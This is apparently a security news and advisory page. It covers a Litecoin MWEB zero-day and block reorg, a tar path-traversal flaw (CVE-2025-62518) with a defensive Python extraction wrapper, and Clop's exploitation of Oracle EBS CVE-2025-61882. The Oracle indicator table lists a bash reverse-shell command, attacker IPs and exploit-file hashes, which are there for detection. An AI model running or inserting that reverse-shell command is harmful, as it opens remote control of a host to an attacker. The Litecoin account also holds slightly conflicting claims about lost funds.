Zeroday

Network Security in Litecoin Compromised by ZeroDay Bug

  • Litecoin network security compromised
  • A zero-day bug caused a DoS attack that disrupted major mining pools.
  • Unpatched Litecoin nodes created the vulnerability: they accepted an invalid MWEB transaction, which allowed the attackers to peg out coins to third-party DEXs.

A sophisticated zero-day bug triggered a chain of events that included a Denial of Service (DoS) attack on Litecoin's major mining pools and a specialized exploit of the MimbleWimble Extension Blocks (MWEB). The zero-day specifically targeted MWEB, Litecoin’s privacy feature, which is complex in nature and therefore creates attack surface. The specific vulnerability has been patched in version 0.21.5.4.

How is Litecoin different from Bitcoin?

Litecoin is a 2011 fork of Bitcoin with faster block times (2.5 minutes vs. 10 minutes), a larger supply cap (84 million vs. 21 million), and the Scrypt mining algorithm instead of SHA-256. The biggest functional difference today is MWEB, which gives Litecoin optional transaction privacy that Bitcoin does not offer at the base layer.

Attack Module

The attack had two components. First, the attackers used a DoS scheme to take mining nodes running the updated code offline. Then, unprotected nodes formed an alternative chain that included invalid MWEB transactions.

What caused the zero day vulnerability?

The bug or flaw led to a denial-of-service assault that temporarily interrupted operations at several prominent mining pools. The event, which occurred over the weekend, exposed a narrow window of risk but was contained efficiently through coordinated technical measures.

At the core of the disruption were mining nodes that had not yet applied the most recent security patches. Litecoin said the bug has now been fully patched, and the network continues to operate normally. A new core version was subsequently released, including important security updates.

The zero-day attack succeeded because many Litecoin nodes ran outdated software that improperly validated MWEB transactions. This created a two-tier network in which different participants operated under distinct consensus rules.

Bitcoin and Litecoin have no mandatory update mechanism, so nodes can, for the most part, run old software indefinitely. Attackers seized this opportunity, and it is the exact weakness exploited in the attack.

Litecoin developers have fixed the issue. The zero-day incident exposes how dependent decentralized networks are on coordinated node updates and careful operator behavior. The network recovered, but it did not emerge unscathed.

The Litecoin team confirmed the bug on their official X account and stated that a patch has been fully deployed, with node operators urged to update immediately. No user funds were lost, but the reorg reversed transactions across 13 blocks, a depth that qualifies as a serious network event by any measure.

Conclusion:

According to security experts, the incident exposed a vulnerability in the update mechanism of Proof-of-Work (PoW) networks and a level of risk in the privacy layers: threat actors took advantage by channeling funds through external platforms while at the same time causing a Denial of Service (DoS) attack on large mining pools. The incident proved how important it is for nodes and miners to stay up to date and patch in a timely manner.

Sources: Litecoin Network Security: Zero-Day Bug Fixed

Litecoin MWEB Exploit Explained | 13-Block Reorg and What It Means | 2026

Google Chrome Patching 3 High Security Flaws Highlights Browser Security

Google Chrome emergency security update tracked as CVE-2026-2441; Highlights Browser Security

SonicWall Releases Patches in Actively Exploited Privilege Escalation Vulnerability

SonicWall has released a security update to fix a privilege escalation vulnerability in the SonicWall SMA1000 Appliance Management Console (AMC) that was exploited in zero-day attacks to escalate privileges.

TARmageddon Exploitable Tar Extraction Flaw Exposes Systems to Privilege Escalation 

Summary: A critical vulnerability known as Tarmageddon (CVE-2025-62518) impacts multiple tar extraction utilities and libraries, including GNU tar, libarchive, Python’s tarfile module, and the Rust async-tar library.

Severity: High
CVSS Score: 7.8
CVEs: CVE-2025-62518
POC Available: Yes, public PoC and patches available (edera-dev GitHub)
Actively Exploited: Widespread exploitation not confirmed; the public PoC raises opportunistic risk
Exploited in Wild: No confirmed mass exploitation at time of writing
Advisory Version: 1.0

Overview 


In Tarmageddon (CVE-2025-62518), improper path sanitization and symlink-target validation during extraction enable a crafted tar archive to write files outside the intended extraction directory, leading to arbitrary file overwrite, privilege escalation, or remote code execution when the extraction is run by privileged or automated services.

| Vulnerability Name | CVE ID | Product Affected | Severity | Fixed Version |
| --- | --- | --- | --- | --- |
| Tar path traversal / symlink bypass (async-tar RCE vector) | CVE-2025-62518 | GNU tar, libarchive, Python tarfile, Rust async-tar and downstream tools | High | Patches released by maintainers; reference fixes in Edera patch repository and vendor advisories |

Technical Summary 

Root cause: insufficient canonicalization of file paths and incomplete sanitization of symlink targets within tar archive headers.

Behavioral details: path traversal via ../ sequences and chained symlinks allows crafted archives to escape the extraction root and overwrite system binaries, configuration files, or startup scripts. A public proof-of-concept confirms this behavior in affected async-tar implementations.

Fix: apply upstream and distribution patches that normalize paths and validate symlink targets (edera-dev patches).

Exploitability: a public PoC exists for CVE-2025-62518. Risk is highest when automated extractions run with elevated privileges (CI/CD, build, backup). Manual extraction is lower risk.

Impact: malicious extraction can overwrite critical files, allow service takeover or remote code execution, and lead to full host compromise if run as root.

| CVE ID | System Affected | Vulnerability Details | Impact |
| --- | --- | --- | --- |
| CVE-2025-62518 | Tar libraries and tools: async-tar, GNU tar, libarchive, Python tarfile, and any tools that use them. | Crafted tar entries can bypass path checks and write outside the extraction folder (PoC available). | Can overwrite files, allow privilege escalation/RCE if run as root, and contaminate build/CI artifacts. |

Remediation

  • Apply patches immediately — update tar libraries and utilities with vendor or distribution fixes (Edera patches where applicable). 
  • Disable automatic extraction of untrusted archives in gateways, ingestion services and CI/CD systems. 
  • Use least privilege for extraction processes — avoid root / Administrator contexts. 
  • Replace unsafe extraction calls (e.g., tarfile.extractall()) with secure wrappers that validate path components and reject traversal or symlink abuses. 
  • Sandbox extraction inside containers or VMs with strict filesystem scoping (read-only mounts, AppArmor/SELinux confinement). 
  • Inventory and update all images, containers, and build artifacts that bundle tar utilities or tar libraries. 
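
The kind of secure wrapper the remediation list calls for, as an added Python example (not code from the advisory or from any affected project): each member's path and link target are resolved against the extraction root immediately before it is written, so a symlink planted by an earlier member is taken into account. The names safe_extract, check_member and try_extract, and the sample archives fed to try_extract, are constructed for illustration.

```python
import io
import os
import tarfile
import tempfile

class UnsafeArchiveError(Exception):
    """A tar member would be written, or would point, outside the root."""

def _inside(root, path):
    # realpath collapses ".." and follows symlinks already on disk.
    root = os.path.realpath(root)
    return os.path.commonpath([root, os.path.realpath(path)]) == root

def check_member(member, dest):
    # join() returns an absolute member name unchanged, so "/etc/x" fails too.
    path = os.path.join(dest, member.name)
    if not _inside(dest, path):
        raise UnsafeArchiveError(f"path escapes root: {member.name!r}")
    if member.issym() or member.islnk():
        # Symlink targets resolve from the link's directory, hard links from root.
        base = os.path.dirname(path) if member.issym() else dest
        if not _inside(dest, os.path.join(base, member.linkname)):
            raise UnsafeArchiveError(f"link escapes root: {member.name!r}")
    elif not (member.isfile() or member.isdir()):
        raise UnsafeArchiveError(f"special file refused: {member.name!r}")

def safe_extract(tar, dest):
    extra = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}  # second layer
    for member in tar.getmembers():
        # Re-checked per member: an earlier member may have planted a symlink.
        check_member(member, dest)
        tar.extract(member, dest, **extra)

def try_extract(entries):
    """Constructed sample input: (name, symlink target or None) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as out:
        for name, link in entries:
            info = tarfile.TarInfo(name)
            if link:
                info.type, info.linkname = tarfile.SYMTYPE, link
            out.addfile(info)  # entries without a link are empty files
    buf.seek(0)
    with tempfile.TemporaryDirectory() as dest, tarfile.open(fileobj=buf) as tar:
        try:
            safe_extract(tar, dest)
            return "ok"
        except UnsafeArchiveError as exc:
            return str(exc)
```

Extraction stops at the first refused member, so members written before it remain on disk; extract into a fresh directory and discard it on failure.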

Detection Guidance

Lab verification: Use the public PoC only in isolated virtual environments to validate that patched versions block path traversal and symlink exploits.

SIEM / EDR indicators: 

  • File create/write events to sensitive paths (/etc, /usr/bin, /var, application config dirs) immediately following tar extraction processes. 
  • Creation of symlinks or reparse-points by tar-related processes. 
  • Processes invoking tar or Python extraction libraries writing outside expected extraction directories. 

Conclusion: 
Tarmageddon (CVE-2025-62518) is a high-risk archive extraction vulnerability that affects widely used tar utilities and libraries, including GNU tar, libarchive, Python’s tarfile, and the Rust async-tar implementation.

This vulnerability should be treated as a Priority-1 patch event for any environment performing automated or privileged tar extractions. Organizations are strongly advised to apply vendor patches immediately, enforce sandboxed extraction workflows, and implement strict least-privilege and path-validation controls to prevent arbitrary file overwrites, privilege escalation, and potential supply-chain compromise. 

Critical Oracle EBS 0-Day Hit by Clop Ransomware; Oracle Released Emergency Patch 

Summary: Security advisory: the Clop ransomware group is running an extortion email campaign targeting customers of Oracle E-Business Suite. The zero-day vulnerability affects Oracle E-Business Suite (EBS), specifically the Concurrent Processing component used with BI Publisher Integration, and is remotely exploitable without authentication. This allows attackers to execute arbitrary code via HTTP.

OEM: Oracle
Severity: Critical
CVSS Score: 9.8
CVEs: CVE-2025-61882
POC Available: Yes
Actively Exploited: Yes
Advisory Version: 1.0

Overview 

Oracle released an emergency patch, and the Clop ransomware group has actively exploited this flaw in real-world data theft campaigns targeting the vulnerable versions in use by organizations.

All EBS versions from 12.2.3 to 12.2.14 are affected, and immediate patching is required to mitigate the vulnerability.

| Vulnerability Name | CVE ID | Product Affected | Severity | Affected Version |
| --- | --- | --- | --- | --- |
| RCE vulnerability in Oracle E-Business Suite | CVE-2025-61882 | Oracle E-Business Suite | Critical | 12.2.3 through 12.2.14 |

Technical Summary 

The vulnerability allows attackers to gain remote code execution by sending specially crafted HTTP requests to exposed Oracle EBS services. Once exploited, it enables full system compromise, including reverse shell access. The vulnerability has been used by the Clop ransomware group in conjunction with other previously known EBS flaws to exfiltrate sensitive data and extort victims. Indicators of compromise (IoCs) such as malicious IPs, shell commands, and exploit files have been published to help organizations detect past intrusions.

Oracle’s fix patches this flaw and also mitigates additional exploitation paths identified during their internal investigation.

| CVE ID | Component Affected | Vulnerability Details | Impact |
| --- | --- | --- | --- |
| CVE-2025-61882 | BI Publisher Integration | A critical unauthenticated RCE in Oracle E-Business Suite affecting the Concurrent Processing/BI Publisher integration. | Full system compromise, data theft. |

Recommendations 

Users and administrators should immediately apply the security patch for CVE-2025-61882 on all affected Oracle E-Business Suite systems:

  • Log in to My Oracle Support. 
  • Use the patch availability document & search for the patch specific to CVE-2025-61882 for your OS and Oracle EBS version. 

Prerequisite: Ensure the October 2023 Critical Patch Update (CPU) is already installed. 

Additional recommendations:

  • If immediate patching is not possible, restrict HTTP/HTTPS access to the EBS application from untrusted networks.
  • Review server logs, network traffic and system processes to detect signs of exploitation. 
  • Monitor for known Indicators of Compromise (IoCs) provided by Oracle from the table below. 

IOCs

| Indicator | Type | Description |
| --- | --- | --- |
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |

Source: Oracle 

Conclusion: 
Exploitation by the ransomware group is an ongoing threat, particularly for unpatched Oracle EBS deployments.

As this is being actively exploited in the wild, organizations should upgrade to the supported patched version, review logs, investigate for signs of compromise using Oracle’s IoCs, and strengthen network access controls around EBS systems. Immediate action is required to reduce the risk of further exploitation, data loss and operational disruption.
